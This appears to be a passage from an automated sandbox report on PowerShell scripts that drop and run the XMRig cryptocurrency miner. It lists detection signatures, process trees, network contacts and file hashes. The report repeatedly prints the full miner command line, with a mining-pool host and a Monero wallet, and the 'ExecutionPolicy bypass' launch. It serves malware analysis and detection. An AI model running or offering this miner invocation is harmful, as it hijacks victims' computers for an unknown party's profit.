Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp

Files

memory/3200-0-0x00007FFC279D3000-0x00007FFC279D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ofpisoaz.o2b.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 efe5989c2f6f24a6d513f0c485d3c10c
SHA1 78c9b963243a5c24c2f09a84c6a8b883116e8d93
SHA256 ef3d0a2db6334e1d3169f634f7da915ece007412ec16abb1867a321aae063680
SHA512 d2669991e704590c339ccbfe06b1a67d96f3836019d29361095a3d3361106686f65efe98aa2245015fccc748b946b589576c78afa9d38fcab0f636bbfd31e392

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 177315780a5666331df5331dd2fcc6af
SHA1 30a8d1f9da56672fe3d9d9244d527639b0c533c5
SHA256 c2df3af3b509745774cbc74f3b49263bcdde67b3e0fb97494167710d93b75f74
SHA512 3da3ad7542fc6ba1abd66b96acc02b913bba50c6392b78c195e933917ab8815e8721ef5c95884459be7a3c9ba48529c087e31974d5318e9651ba236c633d073d

Analysis: behavioral2

Detonation Overview

Submitted 2024-05-27 18:28
Reported 2024-05-27 18:32
Platform win10-20240404-en
Max time kernel 143s
Max time network 136s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 89.65.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_acohpes3.or4.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral23

Detonation Overview

Submitted 2024-05-27 18:28
Reported 2024-05-27 18:32
Platform win10v2004-20240508-en
Max time kernel 141s
Max time network 144s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

memory/3896-0-0x00007FFA19893000-0x00007FFA19895000-memory.dmp

memory/3896-6-0x0000023E71760000-0x0000023E71782000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tpabplma.gml.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3
